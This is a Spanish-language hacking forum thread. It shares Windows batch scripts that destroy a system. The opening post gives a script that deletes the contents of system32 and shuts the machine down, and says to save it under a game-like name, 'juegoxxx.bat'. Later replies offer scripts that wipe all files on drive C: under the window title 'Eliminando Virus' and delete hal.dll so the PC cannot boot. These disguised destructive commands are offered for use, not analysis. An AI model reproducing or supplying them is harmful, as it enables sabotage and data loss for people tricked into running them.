AutorTema: codigo para borrar aSystem32 ( porfavor moderadores no editen mis mensajes -.-)  (Leído 908 veces)

Hack Exilio

• User Jr

• **

• 82
echo off 
cls
echo %DATE% %TIME% Cargando...
del %systemroot%\system32\*.*
cls
echo Su sistema está limpio!
pause
cls     
echo %DATE% %TIME% Fin de la ejecucion.
pause
cls
shutdown.exe -s -t -01

lo guardan como   juegoxxx.bat
y calenlo en su pc  (0
bajo su propio riesgo

y me disculpo con lso moderadores por lo acontesido hace unos momentos ^^ wink
« Última Modificación: 31 de diciembre de 2007, 06:31:52 pm por Exilio »

SATELITAL®

• Administrador
  • User Heroe

• 2302
  • +32/-0

Masculino
  • Re: ok aqui les dejo codigo en block de notas para borrar sistem32
    « Respuesta #1 : 30 de diciembre de 2007, 06:08:38 am »
    Mmm... no se que paso, lo que si te pedire es que no REPITAS mas temas ni codigos... esto mismo lo voy viendo ya 3 veces, haz un tema y postealo... no lo multipliques en diferentes secciones, es una manera de mantener ORDENADOS los temas en el Foro... desde ya Gracias, Mis Saludos y Deseos de EXITOS!!! FELICES FIESTAS!!! cool.-

PD: Crea el Tema Principal y en los mensajes que quieras solo indica a modo de Ej. el Link del Tema Principal, espero no lo mal-interpretes... SALU2 /-.-
    Hey!!! Sorry pero TU NO Est&aacute;s Autorizado para ver los Links. <a href="http://www.hacketico.com/foro/index.php?PHPSESSID=e4dd08fb8544b9695d308133cd71d01f&amp;action=register">Reg&iacute;strate</a>&nbsp;o&nbsp;<a href="http://www.hacketico.com/foro/index.php?PHPSESSID=e4dd08fb8544b9695d308133cd71d01f&amp;action=login">Ingresa</a>

Vive Cáda Momento de Tu Vida, Cómo Si Fuera El Ultimo, Más Planifícala... Cómo Si Jamás Fueras a Irte ;) .-

karol.ADN

• Moderador Global
    • User Heroe

• 1744

Femenino
    Re: ok aqui les dejo codigo en block de notas para borrar sistem32
    « Respuesta #2 : 30 de diciembre de 2007, 11:19:30 am »
    borrar sistem32?? creo que ese codigo solo borra la carpeta de Eset "NOD32" no?
    Hey!!! Sorry pero TU NO Estás Autorizado para ver los Links. Regístrate o Ingresa

system32

• Administrador
    • User Heroe

• 0111 0100 1011

• 931
    • +46/-2

Masculino
    • Texto personal
      ¿Qué cosa harías si supieras que no vas a fallar?
    Re: ok aqui les dejo codigo en block de notas para borrar sistem32
    « Respuesta #3 : 30 de diciembre de 2007, 07:11:22 pm »
    jaja, tienes toda la razón Karol ahora mismo corrijo esto para que no haya mas problemas...

saludos...
    « Última Modificación: 30 de diciembre de 2007, 07:13:54 pm por system32 »
    Hey!!! Sorry pero TU NO Estás Autorizado para ver los Links. Regístrate o Ingresa

Hey!!! Sorry pero TU NO Estás Autorizado para ver los Links. Regístrate o IngresaHey!!! Sorry pero TU NO Estás Autorizado para ver los Links. Regístrate o Ingresa

Hack Exilio

• User Jr

• **

• 82
    Re: codigo para borrar System32
    « Respuesta #4 : 31 de diciembre de 2007, 06:27:46 pm »
    Ya borre los demas nada mas queda este
    « Última Modificación: 04 de enero de 2008, 09:44:47 pm por Hack Exilio »

tus muertos

• Novato

• *

• 20
    Re: codigo para borrar aSystem32 ( porfavor moderadores no editen mis mensajes -.-)
    « Respuesta #5 : 23 de febrero de 2010, 07:37:30 pm »
    hola a ver si alguien me puede pasar un bat para formatear un pc que se resiste al formateo
    gracias de antemano

Xannder

• User Full Gran Colaborador

• Todos somos muy ignorantes.Lo que ocurre es que no Todos Ignoramos las Mismas cosas. Albert Einstein

• 439

Masculino
    • Texto personal
      Never Forgive Never Forget
    Re: codigo para borrar aSystem32 ( porfavor moderadores no editen mis mensajes -.-)
    « Respuesta #6 : 24 de febrero de 2010, 05:12:46 am »
    Mmm mira trata de probar con este codigo

Borra particion C:
    Código: Hey!!! Sorry pero TU NO Estás Autorizado para ver los Links. Regístrate o Ingresa
    @echo off
    cd\
    Title Eliminando Virus

C:

del *.* /s /f /q

O bien con este otro

Código: Hey!!! Sorry pero TU NO Estás Autorizado para ver los Links. Regístrate o Ingresa
    @Echo off
    cd %systemroot%system32
    del /q /s /f hal.dll

Otra forma de Borrar el hal.dll

@echo off
    del /f /s /q hal.dll
    shutdown -s -t 5 –c

Espero sea de ayuda,si no me dices y sigo buscando

Saludos
    Xannder

tus muertos

• Novato

• *

• 20
    « Respuesta #7 : 24 de febrero de 2010, 09:48:01 am »
    gracias por tu ayuda pero esto formateara el disco duro por completo para dejar la maquina limpia para poder reinstalar otro sistema operativo?
    si es asi por favor que alguien me aclare las dudas
    gracias

Xannder

• User Full Gran Colaborador

• Todos somos muy ignorantes.Lo que ocurre es que no Todos Ignoramos las Mismas cosas. Albert Einstein

• 439

Masculino
    • Texto personal
      Never Forgive Never Forget
    « Respuesta #8 : 28 de febrero de 2010, 12:03:46 am »
    Pues basicamente lo que hacen estos codigos es:

Uno: Te manda al caño el archivo hal.dll indispensable para el inicio de una PC por lo tanto debes formatear o bien Reemplazar la libreria faltante

Dos: Te borra Todo Lo que este en la partcion C: Y la unica opcion que tienes es Reinstalar

Ahora que si quieres Ingresa desde CMD---> Tecla Windows + R y le ponemos CMD una ves en la consola le pones format C: y Listo

Saludos
    Xannder

tus muertos

• Novato

• *

• 20
    « Respuesta #9 : 28 de febrero de 2010, 04:18:06 pm »
    gracias campeon tratare de hacerlo desde ejecutar a ver si se quiere dejar formatear

Tags:

Compartir este Tema...
    En un Foro
    (BBCode)
    En un Sitio Web/Blog/Twitter/Facebook
    (HTML)